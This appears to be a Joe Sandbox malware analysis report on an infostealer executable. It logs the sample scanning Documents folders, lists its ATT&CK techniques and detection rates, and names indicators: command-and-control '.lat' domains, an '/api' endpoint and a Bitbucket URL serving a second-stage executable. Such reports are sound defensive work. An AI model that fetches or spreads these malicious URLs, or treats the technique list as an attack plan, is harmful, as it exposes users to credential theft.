                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: number of queries: 1001
                Source: Yara matchFile source: Process Memory Space: Yh6fS6qfTE.exe PID: 7200, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: Yh6fS6qfTE.exe PID: 7200, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation
                1
                DLL Side-Loading
                2
                Process Injection
                34
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                Query Registry
                Remote Services1
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                2
                Process Injection
                LSASS Memory751
                Security Software Discovery
                Remote Desktop Protocol41
                Data from Local System
                1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell
                Logon Script (Windows)Logon Script (Windows)11
                Deobfuscate/Decode Files or Information
                Security Account Manager34
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information
                NTDS2
                Process Discovery
                Distributed Component Object ModelInput Capture114
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing
                LSA Secrets2
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials223
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Yh6fS6qfTE.exe61%ReversingLabsWin32.Infostealer.Tinba
                Yh6fS6qfTE.exe57%VirustotalBrowse
                Yh6fS6qfTE.exe100%AviraTR/Crypt.TPM.Gen
                Yh6fS6qfTE.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                s3-w.us-east-1.amazonaws.com
                52.217.18.140
                truefalse
                  high
                  bitbucket.org
                  185.166.143.50
                  truefalse
                    high
                    observerfry.lat
                    104.21.36.201
                    truefalse
                      high
                      bbuseruploads.s3.amazonaws.com
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        curverpluch.lattrue
                          unknown
                          slipperyloo.lattrue
                            unknown
                            tentabatte.lattrue
                              unknown
                              manyrestro.lattrue
                                unknown
                                bashfulacid.lattrue
                                  unknown
                                  https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exefalse
                                    high
                                    observerfry.lattrue
                                      unknown
                                      wordyfindy.lattrue
                                        unknown
                                        https://observerfry.lat/apitrue
                                          unknown
                                          shapestickyr.lattrue
                                            unknown
                                            talkynicer.lattrue
                                              unknown
                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://duckduckgo.com/chrome_newtabYh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001441000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://duckduckgo.com/ac/?q=Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_PrYh6fS6qfTE.exe, 00000000.00000003.1428212702.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1427021454.0000000005B3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netYh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpgYh6fS6qfTE.exe, 00000000.00000003.1428212702.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1427021454.0000000005B3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://crl.micro0Yh6fS6qfTE.exe, 00000000.00000003.1475916315.0000000001424000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1514509667.000000000142F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700Yh6fS6qfTE.exe, 00000000.00000003.1428212702.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1427021454.0000000005B3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://remote-app-switcher.prod-east.frontend.public.atl-paas.netYh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://x1.c.lencr.org/0Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://x1.i.lencr.org/0Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0Yh6fS6qfTE.exe, 00000000.00000002.1869447514.0000000000D5B000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYiYh6fS6qfTE.exe, 00000000.00000003.1427021454.0000000005B3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchYh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://aui-cdn.atlassian.com/Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://bbuseruploads.s3.amazonaws.com:443/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&ctaYh6fS6qfTE.exe, 00000000.00000003.1428212702.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1427021454.0000000005B3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://support.mozilla.org/products/firefoxgro.allYh6fS6qfTE.exe, 00000000.00000003.1404218755.0000000005BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://observerfry.lat:443/apiYh6fS6qfTE.exe, 00000000.00000003.1514826680.00000000013E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://bitbucket.org/Yh6fS6qfTE.exe, 00000000.00000003.1605364436.0000000001441000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001441000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.netYh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoYh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://web-security-reports.services.atlassian.com/csp-report/bb-websiteYh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://crl.rootca1.amazontrust.com/rootca1.crl0Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://bitbucket.org/G%Yh6fS6qfTE.exe, 00000000.00000003.1605364436.0000000001441000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001441000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://upx.sf.netAmcache.hve.5.drfalse
                                                                                                          high
                                                                                                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64Yh6fS6qfTE.exe, 00000000.00000003.1428212702.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1427021454.0000000005B3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://observerfry.lat/Yh6fS6qfTE.exe, 00000000.00000002.1872268064.00000000013BA000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1514826680.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1514826680.00000000013C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              http://ocsp.rootca1.amazontrust.com0:Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://nsis.sf.net/NSIS_ErrorErrorYh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1875849808.00000000061F9000.00000002.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605121311.0000000005B5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.ecosia.org/newtab/Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brYh6fS6qfTE.exe, 00000000.00000003.1404218755.0000000005BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://dz8aopenkvv6s.cloudfront.netYh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://ac.ecosia.org/autocomplete?q=Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgYh6fS6qfTE.exe, 00000000.00000003.1428212702.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1427021454.0000000005B3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netYh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://cdn.cookielaw.org/Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://observerfry.lat/apicYh6fS6qfTE.exe, 00000000.00000003.1514826680.00000000013E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://remote-app-switcher.stg-east.frontend.public.atl-paas.netYh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://bbuseruploads.s3.amazonaws.com/Yh6fS6qfTE.exe, 00000000.00000002.1872620005.00000000013E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            • No. of IPs < 25%
                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                            • 75% < No. of IPs
                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                            104.21.36.201
                                                                                                                                            observerfry.latUnited States
                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                            185.166.143.50
                                                                                                                                            bitbucket.orgGermany
                                                                                                                                            16509AMAZON-02USfalse
                                                                                                                                            52.217.18.140
                                                                                                                                            s3-w.us-east-1.amazonaws.comUnited States
                                                                                                                                            16509AMAZON-02USfalse
                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                            Analysis ID:1579720
                                                                                                                                            Start date and time:2024-12-23 08:03:11 +01:00
                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                            Overall analysis duration:0h 6m 1s
                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                            Report type:full
                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                            Number of analysed new started processes analysed:10
                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                            Technologies:
                                                                                                                                            • HCA enabled
                                                                                                                                            • EGA enabled
                                                                                                                                            • AMSI enabled
                                                                                                                                            Analysis Mode:default
                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                            Sample name:Yh6fS6qfTE.exe
                                                                                                                                            renamed because original name is a hash value
                                                                                                                                            Original Sample Name:6cb8e80fe23740dff137816a6572a5ba.exe
